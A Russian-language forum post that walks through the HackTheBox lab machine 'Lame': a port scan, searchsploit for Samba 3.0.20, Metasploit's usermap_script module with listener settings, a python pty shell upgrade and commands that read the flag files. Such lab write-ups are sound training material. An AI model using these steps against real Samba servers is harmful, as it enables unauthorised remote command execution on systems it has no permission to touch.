• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Ностальгический HackTheBox {Lame}

OWL

CD-диск
Пользователь
Регистрация
06.04.2021
Сообщения
11
Реакции
11
Привет, форумчани! Сегодня решил пройти с вами машину на HackTheBox под названием Lame «Очень старая машина, но одлы вспомнят». Давайте начнем!
fab32d2d102241d781967.jpg



Для начала давайте добавим машину в /etc/hosts для удобства.

10.129.126.131 lame.htb

Теперь нам надо просканировать машину на наличие открытых портов и информацию о них. Для этого пишем:

c584ed79ff0994034a911.png

Теперь мы можем увидеть строку:

445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

Как мы можем видеть это у нас 445 - SMB. Давайте попробуем через searchsploit найти уязвимости в smbd 3.0.20:

searchsploit samba 3.0.20

81728795fe7b9ed9da545.png

Здесь мы увидим Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metas | unix/remote/16320.rb. Если вы решили пройти эту машину через smbclient, то данная уязвимость вам очень понадобиться. Но давайте запустим metasploit:

msfconsole

Теперь давайте напишем search samba и посмотрим что нам покажет msf:

2a4cea6b2bea52e613fa2.png

Нам понадобиться exploit/multi/samba/usermap_script. Теперь пишем use exploit/multi/samba/usermap_script

И теперь пишем настройки:

Код:
set lhost tun0

set rhost ip-машины

set port 4444

11fa40f9b3fda55e27a77.png

Ну и после этого пишем exploit:

b69ae0b6502676830fdea.png

Вот мы и получили шелл. Но давайте заспавним bash :D Для этого пишем:

python -c 'import pty;pty.spawn("/bin/bash")'



4a83950aac5739b77174b.png

После всех этих действий нам осталось найти флаги. Для этого пишем:

find . -name user.txt -exec cat {} \;


find . -name root.txt -exec cat {} \;

Вот мы и прошли эту не сложную машину. Это моя первая статья так что строго не судите.
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх